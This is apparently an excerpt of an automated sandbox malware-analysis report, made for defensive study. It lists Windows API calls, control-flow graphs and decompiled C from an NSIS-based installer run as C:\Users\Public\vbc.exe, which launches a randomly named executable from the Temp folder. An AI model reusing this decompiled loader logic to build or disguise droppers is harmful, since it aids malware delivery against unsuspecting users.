                          0x00403991
                          0x004039a0
                          0x004039a0
                          0x004039a9
                          0x004039b2
                          0x004039bd
                          0x004039bd
                          0x004039c9
                          0x004039e5
                          0x004039e8
                          0x004039fb
                          0x00403a01
                          0x00403aa4
                          0x00000000
                          0x00403aad
                          0x00403a07
                          0x00403a14
                          0x00403a16
                          0x00403a18
                          0x00403a37
                          0x00403a37
                          0x00403a3a
                          0x00403a3f
                          0x00403a42
                          0x00403a52
                          0x00403a53
                          0x00403a55
                          0x00403a8b
                          0x00403a9e
                          0x00000000
                          0x00403a9e
                          0x00403a57
                          0x00403a5d
                          0x00403a76
                          0x00403a7b
                          0x00403a7d
                          0x00000000
                          0x00000000
                          0x00403a7f
                          0x00403a6b
                          0x00403a6b
                          0x00403a6d
                          0x00403a6d
                          0x00000000
                          0x00403a6d
                          0x00403a60
                          0x00403a65
                          0x00000000
                          0x00403a65
                          0x00403a44
                          0x00403a4a
                          0x00000000
                          0x00000000
                          0x00403a4c
                          0x00000000
                          0x00403a4c
                          0x00403a3c
                          0x00000000
                          0x00403a3c
                          0x00403a22
                          0x00403a29
                          0x00403a2f
                          0x00403a31
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403a31
                          0x004039ed
                          0x00000000
                          0x004039cb
                          0x004039d1
                          0x004039db
                          0x00403de1
                          0x00403de1
                          0x00403de7
                          0x00403de9
                          0x00403def
                          0x00403df4
                          0x00403dfa
                          0x00403dfa
                          0x00403def
                          0x00403e04
                          0x00000000
                          0x00403e04
                          0x004039c9

                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                          • ShowWindow.USER32(?), ref: 004039BD
                          • DestroyWindow.USER32 ref: 004039D1
                          • SetWindowLongA.USER32 ref: 004039ED
                          • GetDlgItem.USER32(?,?), ref: 00403A0E
                          • SendMessageA.USER32 ref: 00403A22
                          • IsWindowEnabled.USER32(00000000), ref: 00403A29
                          • GetDlgItem.USER32(?,00000001), ref: 00403AD7
                          • GetDlgItem.USER32(?,00000002), ref: 00403AE1
                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403AFB
                          • SendMessageA.USER32 ref: 00403B4C
                          • GetDlgItem.USER32(?,00000003), ref: 00403BF2
                          • ShowWindow.USER32(00000000,?), ref: 00403C13
                          • EnableWindow.USER32(?,?), ref: 00403C25
                          • EnableWindow.USER32(?,?), ref: 00403C40
                          • GetSystemMenu.USER32 ref: 00403C56
                          • EnableMenuItem.USER32 ref: 00403C5D
                          • SendMessageA.USER32 ref: 00403C75
                          • SendMessageA.USER32 ref: 00403C88
                          • lstrlenA.KERNEL32(00420498,?,00420498,fwwmjbqpxzax Setup), ref: 00403CB1
                          • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                          • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                          • String ID: fwwmjbqpxzax Setup
                          • API String ID: 184305955-1093331389
                          • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                          • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                          • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                          • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004035E3 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213stringregistrylibraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 209 4035e3-4035fb call 405da3 212 4035fd-40360d call 4059e3 209->212 213 40360f-403636 call 40596c 209->213 220 403659-403678 call 403897 call 405659 212->220 218 403638-403649 call 40596c 213->218 219 40364e-403654 lstrcatA 213->219 218->219 219->220 227 40367e-403683 220->227 228 4036ff-403707 call 405659 220->228 227->228 229 403685-4036a9 call 40596c 227->229 234 403715-40373a LoadImageA 228->234 235 403709-403710 call 405aa7 228->235 229->228 236 4036ab-4036ad 229->236 238 403740-403776 RegisterClassA 234->238 239 4037c9-4037d1 call 40140b 234->239 235->234 241 4036be-4036ca lstrlenA 236->241 242 4036af-4036bc call 4055a3 236->242 243 40377c-4037c4 SystemParametersInfoA CreateWindowExA 238->243 244 40388d 238->244 251 4037d3-4037d6 239->251 252 4037db-4037e6 call 403897 239->252 248 4036f2-4036fa call 405578 call 405a85 241->248 249 4036cc-4036da lstrcmpiA 241->249 242->241 243->239 246 40388f-403896 244->246 248->228 249->248 250 4036dc-4036e6 GetFileAttributesA 249->250 255 4036e8-4036ea 250->255 256 4036ec-4036ed call 4055bf 250->256 251->246 262 403864-40386c call 404ef5 252->262 263 4037e8-403805 ShowWindow LoadLibraryA 252->263 255->248 255->256 256->248 270 403886-403888 call 40140b 262->270 271 40386e-403874 262->271 264 403807-40380c LoadLibraryA 263->264 265 40380e-403820 GetClassInfoA 263->265 264->265 268 403822-403832 GetClassInfoA RegisterClassA 265->268 269 403838-40385b DialogBoxParamA call 40140b 265->269 268->269 275 403860-403862 269->275 270->244 271->251 273 40387a-403881 call 40140b 271->273 273->251 275->246
                          C-Code - Quality: 96%
                          			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0; // 0x8c0fa0
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t24 =  *0x423eb8; // 0x80
				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x423f20 = _t24 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040);
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40; // 0x0
							if(__eflags != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c; // 0x7fffffff
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t39 =  *0x423680; // 0x0
							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0; // 0x400000
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 = _t75;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x423ed8; // 0x8c1cb8
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x43
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                          0x004035e9
                          0x004035f2
                          0x004035f9
                          0x004035fb
                          0x0040360f
                          0x00403621
                          0x0040362b
                          0x00403630
                          0x00403636
                          0x00403649
                          0x00403649
                          0x00403654
                          0x004035fd
                          0x00403608
                          0x00403608
                          0x00403659
                          0x0040365e
                          0x00403663
                          0x0040366c
                          0x00403678
                          0x004036ff
                          0x00403707
                          0x00403710
                          0x00403710
                          0x00403726
                          0x0040372c
                          0x0040373a
                          0x004037c9
                          0x004037d1
                          0x004037db
                          0x004037e0
                          0x004037e6
                          0x00403865
                          0x0040386a
                          0x0040386c
                          0x00403888
                          0x00000000
                          0x00403888
                          0x0040386e
                          0x00403874
                          0x0040387c
                          0x0040387c
                          0x00000000
                          0x00403874
                          0x004037f0
                          0x00403801
                          0x00403803
                          0x00403805
                          0x0040380c
                          0x0040380c
                          0x00403814
                          0x0040381c
                          0x0040381e
                          0x00403820
                          0x00403829
                          0x0040382c
                          0x00403832
                          0x00403832
                          0x00403838
                          0x00403851
                          0x0040385b
                          0x00000000
                          0x00403860
                          0x004037d3
                          0x004037d5
                          0x00000000
                          0x00403740
                          0x00403740
                          0x00403746
                          0x00403750
                          0x00403758
                          0x00403762
                          0x00403768
                          0x00403776
                          0x0040388d
                          0x0040388d
                          0x00000000
                          0x0040388d
                          0x0040377c
                          0x00403785
                          0x004037c4
                          0x00000000
                          0x004037c4
                          0x0040367e
                          0x0040367e
                          0x00403683
                          0x00000000
                          0x00000000
                          0x00403688
                          0x0040368d
                          0x0040369d
                          0x004036a2
                          0x004036a9
                          0x00000000
                          0x00000000
                          0x004036ad
                          0x004036af
                          0x004036bc
                          0x004036bc
                          0x004036c4
                          0x004036ca
                          0x004036f2
                          0x004036fa
                          0x00000000
                          0x004036dc
                          0x004036dd
                          0x004036e6
                          0x004036ec
                          0x004036ed
                          0x00000000
                          0x004036ed
                          0x004036e8
                          0x004036ea
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004036ea
                          0x004036ca

                          APIs
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNEL32(?), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403268,00000008), ref: 00405DD1
                          • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\Public\vbc.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,?,?,?,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\Public\vbc.exe" ), ref: 004036BF
                          • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,?,?,?,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                          • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd), ref: 004036DD
                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403726
                            • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                          • RegisterClassA.USER32 ref: 0040376D
                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                          • CreateWindowExA.USER32 ref: 004037BE
                          • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                          • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                          • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                          • GetClassInfoA.USER32(00000000,RichEdit20A,00423640), ref: 0040381C
                          • GetClassInfoA.USER32(00000000,RichEdit,00423640), ref: 00403829
                          • RegisterClassA.USER32(00423640), ref: 00403832
                          • DialogBoxParamA.USER32 ref: 00403851
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                          • API String ID: 914957316-1845516748
                          • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                          • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                          • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                          • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402C5B Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 278 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 281 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 278->281 282 402cab-402cb0 278->282 290 402dd3-402de1 call 402bc5 281->290 291 402ce9-402d00 281->291 283 402efa-402efe 282->283 297 402eb2-402eb7 290->297 298 402de7-402dea 290->298 292 402d02 291->292 293 402d04-402d0a call 4031a8 291->293 292->293 299 402d0f-402d11 293->299 297->283 300 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 298->300 301 402dec-402dfd call 4031da call 4031a8 298->301 302 402d17-402d1d 299->302 303 402e6e-402e76 call 402bc5 299->303 328 402e64-402e69 300->328 329 402e78-402ea8 call 4031da call 402f01 300->329 321 402e02-402e04 301->321 306 402d9d-402da1 302->306 307 402d1f-402d37 call 40571d 302->307 303->297 310 402da3-402da9 call 402bc5 306->310 311 402daa-402db0 306->311 307->311 325 402d39-402d40 307->325 310->311 317 402db2-402dc0 call 405e0f 311->317 318 402dc3-402dcd 311->318 317->318 318->290 318->291 321->297 326 402e0a-402e10 321->326 325->311 330 402d42-402d49 325->330 326->297 326->300 328->283 338 402ead-402eb0 329->338 330->311 332 402d4b-402d52 330->332 332->311 334 402d54-402d5b 332->334 334->311 336 402d5d-402d7d 334->336 336->297 337 402d83-402d87 336->337 339 402d89-402d8d 337->339 340 402d8f-402d97 337->340 338->297 341 402eb9-402eca 338->341 339->290 339->340 340->311 342 402d99-402d9b 340->342 343 402ed2-402ed7 341->343 344 402ecc 341->344 342->311 345 402ed8-402ede 343->345 344->343 345->345 346 402ee0-402ef8 call 40571d 345->346 346->283
                          C-Code - Quality: 96%
                          			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				signed int _t63;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\Public\\vbc.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\Public", "C:\\Users\\Public\\vbc.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\Public"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4; // 0x7e00
					if(__eflags == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t63 =  *0x423eb4; // 0x7e00
							_t65 = E004031DA(_t63 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x56a38
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t79 =  *0x423eb4; // 0x7e00
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4; // 0x7e00
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x196a5
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x19be0
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

































                          0x00402c69
                          0x00402c6c
                          0x00402c86
                          0x00402c8b
                          0x00402c9e
                          0x00402ca3
                          0x00402ca9
                          0x00000000
                          0x00402cab
                          0x00402cbc
                          0x00402ccd
                          0x00402cd4
                          0x00402cda
                          0x00402cdc
                          0x00402ce1
                          0x00402ce3
                          0x00402dd3
                          0x00402dd5
                          0x00402dda
                          0x00402de1
                          0x00000000
                          0x00000000
                          0x00402de7
                          0x00402dea
                          0x00402e16
                          0x00402e1b
                          0x00402e26
                          0x00402e28
                          0x00402e39
                          0x00402e54
                          0x00402e5a
                          0x00402e5d
                          0x00402e62
                          0x00402e78
                          0x00402e81
                          0x00402e91
                          0x00402ea3
                          0x00402ea8
                          0x00402ead
                          0x00402eb0
                          0x00402eb9
                          0x00402ebd
                          0x00402ec5
                          0x00402eca
                          0x00402ecc
                          0x00402ecc
                          0x00402ecc
                          0x00402ed4
                          0x00402ed4
                          0x00402ed7
                          0x00402ed8
                          0x00402ed8
                          0x00402edb
                          0x00402edd
                          0x00402edd
                          0x00402edd
                          0x00402ee0
                          0x00402ee7
                          0x00402ef3
                          0x00402ef8
                          0x00000000
                          0x00402ef8
                          0x00000000
                          0x00402eb0
                          0x00000000
                          0x00402e64
                          0x00402df2
                          0x00402dfd
                          0x00402e02
                          0x00402e04
                          0x00000000
                          0x00000000
                          0x00402e0d
                          0x00402e10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402ce9
                          0x00402ce9
                          0x00402ce9
                          0x00402cee
                          0x00402cf2
                          0x00402cf9
                          0x00402cfe
                          0x00402d00
                          0x00402d02
                          0x00402d02
                          0x00402d0a
                          0x00402d0f
                          0x00402d11
                          0x00402e70
                          0x00402eb2
                          0x00000000
                          0x00402eb2
                          0x00402d17
                          0x00402d1d
                          0x00402d9d
                          0x00402da1
                          0x00402da4
                          0x00402da9
                          0x00000000
                          0x00402da1
                          0x00402d2a
                          0x00402d2f
                          0x00402d32
                          0x00402d37
                          0x00000000
                          0x00000000
                          0x00402d39
                          0x00402d40
                          0x00000000
                          0x00000000
                          0x00402d42
                          0x00402d49
                          0x00000000
                          0x00000000
                          0x00402d4b
                          0x00402d52
                          0x00000000
                          0x00000000
                          0x00402d54
                          0x00402d5b
                          0x00000000
                          0x00000000
                          0x00402d5d
                          0x00402d63
                          0x00402d6c
                          0x00402d72
                          0x00402d75
                          0x00402d77
                          0x00402d7d
                          0x00000000
                          0x00000000
                          0x00402d83
                          0x00402d87
                          0x00402d8f
                          0x00402d8f
                          0x00402d92
                          0x00402d95
                          0x00402d97
                          0x00402d99
                          0x00402d99
                          0x00000000
                          0x00402d97
                          0x00402d89
                          0x00402d8d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402daa
                          0x00402daa
                          0x00402db0
                          0x00402dc0
                          0x00402dc0
                          0x00402dc3
                          0x00402dc9
                          0x00402dcb
                          0x00402dcb
                          0x00000000
                          0x00402ce9

                          APIs
                          • GetTickCount.KERNEL32("C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 00402C6F
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402C8B
                            • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405760
                            • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402CD4
                          • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                          • API String ID: 2803837635-1404970732
